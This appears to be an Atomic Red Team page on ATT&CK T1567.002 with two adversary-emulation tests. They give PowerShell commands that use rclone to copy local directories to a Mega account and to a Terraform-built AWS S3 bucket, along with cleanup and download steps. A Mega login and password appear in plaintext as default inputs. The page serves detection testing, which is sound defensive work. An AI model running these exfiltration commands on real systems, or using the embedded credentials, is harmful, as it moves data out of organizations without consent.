Skip to content
Atomic Red Team
atomics
T1567.002

T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage

Description from ATT&CK (opens in a new tab)

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

Atomic Tests


Atomic Test #1 - Exfiltrate data with rclone to cloud Storage - Mega (Windows)

This test uses rclone to exfiltrate data to a remote cloud storage instance. (Mega) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 8529ee44-279a-4a19-80bf-b846a40dda58

Inputs:

NameDescriptionTypeDefault Value
rclone_pathDirectory of rclone.exepathPathToAtomicsFolder\..\ExternalPayloads\T1567.002\rclone-v*\
rclone_config_pathPath to rclone's config file (default should be fine)path$env:appdata
dir_to_copyDirectory to copystringPathToAtomicsFolder\..\ExternalPayloads\T1567.002
mega_user_accountMega user accountstringatomictesting@outlook.com
mega_user_passwordMega user passwordstringvmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA
remote_shareRemote Mega sharestringT1567002

Attack Commands: Run with powershell!

New-Item #{rclone_config_path}\rclone -ItemType directory
New-Item #{rclone_config_path}\rclone\rclone.conf
cd "#{rclone_path}"
.\rclone.exe config create #{remote_share} mega
set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
.\rclone.exe copy --max-size 1700k "#{dir_to_copy}" #{remote_share}:test -v

Cleanup Commands:

cd "#{rclone_path}"
.\rclone.exe purge #{remote_share}:test
.\rclone.exe config delete #{remote_share}:
Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue
cd c:\
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\rclone.zip"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\T1567.002" -recurse -force

Dependencies: Run with powershell!

Description: rclone must exist at (#{rclone_path})
Check Prereq Commands:
if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rclone.zip"
Expand-archive -path "PathToAtomicsFolder\..\ExternalPayloads\rclone.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\T1567.002\" -force


Atomic Test #2 - Exfiltrate data with rclone to cloud Storage - AWS S3

This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ (opens in a new tab)

Supported Platforms: Linux, macOS

auto_generated_guid: a4b74723-5cee-4300-91c3-5e34166909b4

Inputs:

NameDescriptionTypeDefault Value
rclone_pathDirectory of rclone.exepathPathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*/
exfil_directoryDirectory to exfiltratestringPathToAtomicsFolder/../ExternalPayloads/T1567.002/data/
terraform_pathDirectory of terraformpathPathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*
aws_access_keyAWS Access Keystring
aws_secret_keyAWS Secret Keystring
aws_regionAWS Regionstringus-east-1
aws_profileAWS Profilestringdefault

Attack Commands: Run with powershell!

Write-Host "Deploying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
  $env:AWS_PROFILE = "#{aws_profile}"
} else {
  $env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
  $env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
Write-Host "Generating rclone config... " -NoNewLine
$config = @"
[exfils3]
type = s3
provider = AWS
env_auth = true
region = #{aws_region}
"@
$config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
Write-Host "Done!"
Write-Host "Exfiltrating data... " -NoNewLine
$bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
$null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
Write-Host "Done!"

Cleanup Commands:

Write-Host "Destroying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
  $env:AWS_PROFILE = "#{aws_profile}"
} else {
  $env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
  $env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"

Dependencies: Run with powershell!

Description: rclone must exist at (#{rclone_path})
Check Prereq Commands:
if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
$arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
$operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
if ($operatingSystem -match "darwin") {
  Invoke-WebRequest "https://downloads.rclone.org/rclone-current-osx-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
} elseif ($operatingSystem -match "linux") {
  Invoke-WebRequest "https://downloads.rclone.org/rclone-current-linux-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
}
Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/rclone.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/" -force
Description: terraform must exist at (#{terraform_path})
Check Prereq Commands:
if (Test-Path "#{terraform_path}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
$arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
$operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
if ($operatingSystem -match "darwin") {
  Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_darwin_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
} elseif ($operatingSystem -match "linux") {
  Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_linux_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
}
Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/terraform.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v1.10.5/" -force
Description: Must provide a valid directory or file path to exfiltrate to AWS S3
Check Prereq Commands:
if (Test-Path "#{exfil_directory}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data" -ErrorAction Ignore -Force | Out-Null
foreach($fileSuffix in 1..10) {
  Set-Content "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/test$fileSuffix.txt" "This is a test file"
}